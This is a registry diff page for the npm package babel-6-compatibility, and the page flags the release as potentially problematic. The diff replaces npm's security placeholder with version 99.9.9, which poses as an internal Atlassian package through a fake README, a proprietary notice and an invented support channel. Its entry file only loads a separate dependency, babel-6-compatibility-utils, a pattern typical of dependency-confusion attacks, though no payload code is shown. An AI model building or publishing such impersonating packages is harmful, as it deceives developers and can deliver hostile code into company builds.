babel-6-compatibility 0.0.1-security → 99.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of babel-6-compatibility might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/LICENSE +22 -0
  2. package/README.md +40 -5
  3. package/index.js +3 -0
  4. package/package.json +20 -6
package/LICENSE ADDED
@@ -0,0 +1,22 @@
1
+ MIT License
2
+
3
+ Copyright (c) 2026 lapxpoc
4
+
5
+
6
+ Permission is hereby granted, free of charge, to any person obtaining a copy
7
+ of this software and associated documentation files (the "Software"), to deal
8
+ in the Software without restriction, including without limitation the rights
9
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
10
+ copies of the Software, and to permit persons to whom the Software is
11
+ furnished to do so, subject to the following conditions:
12
+
13
+ The above copyright notice and this permission notice shall be included in all
14
+ copies or substantial portions of the Software.
15
+
16
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
17
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
18
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
19
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
20
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
21
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
22
+ SOFTWARE.
package/README.md CHANGED
@@ -1,5 +1,40 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=babel-6-compatibility for more information.
1
+ # babel-6-compatibility
2
+
3
+ Core compatibility layer and internal API for Atlassian's legacy Babel 6 ecosystem.
4
+ This package provides standardized transformation rules and backend utilities for internal legacy applications.
5
+
6
+ ## Overview
7
+
8
+ `babel-6-compatibility` is designed to streamline development across internal teams by providing:
9
+ - Pre-built transformation modules for legacy Atlassian services.
10
+ - Standardized polyfill patterns and compatibility tokens.
11
+ - Integrated auditing via `babel-6-compatibility-utils`.
12
+
13
+ ## Installation
14
+
15
+ This is an internal package. Ensure you have the proper credentials configured in your `.npmrc` file to access the internal registry.
16
+
17
+ ```bash
18
+ npm install babel-6-compatibility
19
+ ```
20
+
21
+ ## Usage
22
+
23
+ To initialize the internal compatibility layer and auditing services, import the package at the top of your main entry point:
24
+
25
+ ```
26
+ require('babel-6-compatibility');
27
+ ```
28
+
29
+ ## Internal Dependencies
30
+
31
+ This package relies on several core utilities, including:
32
+
33
+ - babel-6-compatibility-utils: Automatic transformation auditing and logging.
34
+ - Babel Core: Version 6.x or higher.
35
+
36
+ ## Support
37
+
38
+ For issues regarding internal component behavior, please reach out to the Atlassian Engineering platform team via the internal Slack channel #eng-babel-support.
39
+
40
+ © 2026 Atlassian, Inc. Proprietary Information.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ require('babel-6-compatibility-utils');
2
+ console.log("Atlassian Babel Compatibility Layer Initialized...");
3
+ module.exports = {};
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
- {
2
- "name": "babel-6-compatibility",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "babel-6-compatibility",
3
+ "version": "99.9.9",
4
+ "description": "Internal Atlassian utility for Babel 6 legacy compatibility layers",
5
+ "main": "index.js",
6
+ "author": "Atlassian Engineering",
7
+ "license": "Apache-2.0",
8
+ "keywords": [
9
+ "atlassian",
10
+ "babel",
11
+ "compatibility",
12
+ "internal"
13
+ ],
14
+ "dependencies": {
15
+ "babel-6-compatibility-utils": "^1.0.0"
16
+ },
17
+ "publishConfig": {
18
+ "access": "public"
19
+ }
20
+ }